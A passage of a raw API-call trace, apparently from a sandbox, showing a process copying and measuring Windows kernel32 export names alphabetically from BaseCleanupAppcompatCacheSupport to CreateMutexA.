returned="BaseCleanupAppcompatCacheSupport" [0187.046] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0187.046] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0187.046] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0187.046] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0187.046] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0187.047] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0187.047] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0187.047] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0187.047] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0187.047] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0187.047] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0187.047] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0187.047] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0187.047] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0187.047] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0187.047] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0187.047] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0187.047] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0187.047] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0187.047] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0187.047] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0187.047] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0187.047] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0187.047] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0187.047] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0187.048] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0187.048] lstrlenA (lpString="BEEP") returned 4 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0187.048] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0187.048] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0187.048] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0187.048] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0187.048] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0187.048] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0187.048] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0187.048] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0187.048] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0187.048] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0187.048] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0187.048] lstrlenA (lpString="CANCELIO") returned 8 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0187.048] lstrlenA (lpString="CANCELIOEX") returned 10 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0187.048] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0187.048] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0187.048] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0187.048] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0187.048] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0187.049] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0187.049] lstrlenA (lpString="CHECKELEVATION") returned 14 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0187.049] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0187.049] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0187.049] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0187.049] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0187.049] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0187.049] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0187.049] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0187.049] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0187.049] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0187.049] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0187.049] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0187.049] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0187.049] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0187.049] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0187.049] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0187.049] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0187.049] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0187.050] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0187.050] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0187.050] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0187.050] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0187.050] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0187.050] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0187.050] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0187.050] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0187.050] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0187.050] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0187.050] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0187.050] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0187.050] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0187.050] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0187.050] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0187.050] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0187.050] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0187.050] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0187.050] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0187.050] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0187.050] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0187.051] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0187.051] lstrlenA (lpString="COPYCONTEXT") returned 11 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0187.051] lstrlenA (lpString="COPYFILEA") returned 9 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0187.051] lstrlenA (lpString="COPYFILEEXA") returned 11 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0187.051] lstrlenA (lpString="COPYFILEEXW") returned 11 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0187.051] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0187.051] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0187.051] lstrlenA (lpString="COPYFILEW") returned 9 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0187.051] lstrlenA (lpString="COPYLZFILE") returned 10 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0187.051] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0187.051] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0187.051] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0187.051] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0187.051] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0187.051] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0187.051] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0187.051] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0187.051] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0187.051] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0187.051] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0187.052] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0187.052] lstrlenA (lpString="CREATEEVENTA") returned 12 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0187.052] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0187.052] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0187.052] lstrlenA (lpString="CREATEEVENTW") returned 12 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0187.052] lstrlenA (lpString="CREATEFIBER") returned 11 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0187.052] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0187.052] lstrlenA (lpString="CREATEFILEA") returned 11 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0187.052] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0187.052] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0187.052] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0187.052] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0187.052] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0187.052] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0187.052] lstrlenA (lpString="CREATEFILEW") returned 11 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0187.052] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0187.052] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0187.053] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0187.053] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0187.053] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0187.053] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0187.053] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0187.053] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0187.053] lstrlenA (lpString="CREATEJOBSET") returned 12 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0187.053] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0187.053] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0187.053] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") 